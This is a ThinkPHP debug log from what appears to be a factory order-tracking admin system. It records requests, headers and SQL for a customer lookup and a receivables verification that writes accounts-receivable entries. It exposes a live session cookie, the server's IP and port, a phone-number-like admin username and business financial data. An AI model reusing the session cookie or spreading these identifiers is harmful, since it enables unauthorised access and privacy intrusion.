'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11831?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1765702080', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001616s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000103s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:48:01+08:00 ] 106.112.204.117 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.047948s][吞吐率:20.86req/s] [内存消耗:5,010.32kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001104s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11831?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '166', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '166', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001454s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007736s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000534s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000805s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (166) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000373s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (166) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000593s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000618s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"166\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"166\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702081) [ RunTime:0.005901s ] --------------------------------------------------------------- [ 2025-12-14T16:48:39+08:00 ] 106.112.204.117 POST /admin/financial/verifybill/hedui/ids/11831?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11831?dialog=1 [运行时间:0.152329s][吞吐率:6.56req/s] [内存消耗:6,198.87kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001247s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '641', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11831?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '廖', 1 => '166', ), 'verify_amount' => array ( 0 => '70000', 1 => '5000', 2 => '5000', 3 => '5000', ), 'price' => array ( 0 => '0.07', 1 => '3.87', 2 => '0.5300000000', 3 => '0.3000000000', ), 'money' => array ( 0 => '4900.000000000001', 1 => '19350', 2 => '2650.0000000000', 3 => '1500.0000000000', ), 'explain' => array ( 0 => '大平压板70000个', 1 => '50W-14底壳5000个', 2 => '50W-3上盖5000个', 3 => '50W散热器5000个', ), 'shoukuan_status-1' => '0', 'shoukuan_status-2' => '0', 'shoukuan_status-3' => '0', 'shoukuan_status-4' => '0', 'ids' => '11831', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001611s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.009289s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000513s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000976s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000567s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000935s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001397s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000868s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000331s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000801s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000910s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000679s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000726s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000783s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11831' [ RunTime:0.025547s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=70000,`price`=0.07,`money`=4900 WHERE `id` = 27831 [ RunTime:0.005895s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.001029s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000373s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (166 , 40 , 53617 , 1021 , 11831 , 27831 , 1 , 2025 , 12 , 14 , '大平压板70000个' , 1765702119 , 4900 , 10772429.790661) [ RunTime:0.005153s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5000,`price`=3.87,`money`=19350 WHERE `id` = 27832 [ RunTime:0.005102s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000338s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (166 , 40 , 53618 , 1120 , 11831 , 27832 , 1 , 2025 , 12 , 14 , '50W-14底壳5000个' , 1765702119 , 19350 , 10791779.790661) [ RunTime:0.005181s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5000,`price`=0.53,`money`=2650 WHERE `id` = 27833 [ RunTime:0.006066s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000478s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (166 , 40 , 53619 , 1123 , 11831 , 27833 , 1 , 2025 , 12 , 14 , '50W-3上盖5000个' , 1765702119 , 2650 , 10794429.790661) [ RunTime:0.004993s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5000,`price`=0.3,`money`=1500 WHERE `id` = 27834 [ RunTime:0.004955s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000379s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (166 , 40 , 53621 , 1059 , 11831 , 27834 , 1 , 2025 , 12 , 14 , '50W散热器5000个' , 1765702119 , 1500 , 10795929.790661) [ RunTime:0.006491s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000754s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u5ed6\",\"166\"],\"verify_amount\":[\"70000\",\"5000\",\"5000\",\"5000\"],\"price\":[\"0.07\",\"3.87\",\"0.5300000000\",\"0.3000000000\"],\"money\":[\"4900.000000000001\",\"19350\",\"2650.0000000000\",\"1500.0000000000\"],\"explain\":[\"\\u5927\\u5e73\\u538b\\u677f70000\\u4e2a\",\"50W-14\\u5e95\\u58f35000\\u4e2a\",\"50W-3\\u4e0a\\u76d65000\\u4e2a\",\"50W\\u6563\\u70ed\\u56685000\\u4e2a\"],\"shoukuan_status-1\":\"0\",\"shoukuan_status-2\":\"0\",\"shoukuan_status-3\":\"0\",\"shoukuan_status-4\":\"0\",\"ids\":\"11831\"}' , '/admin/financial/verifybill/hedui/ids/11831?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702119) [ RunTime:0.007276s ] --------------------------------------------------------------- [ 2025-12-14T16:48:40+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970984 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970984 [运行时间:0.350647s][吞吐率:2.85req/s] [内存消耗:5,714.41kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001563s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701970984', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002399s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000111s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000484s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000771s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000476s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000666s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001030s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000828s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000366s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000740s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000705s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000754s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.038074s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.035724s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11830 [ RunTime:0.013735s ] [ sql 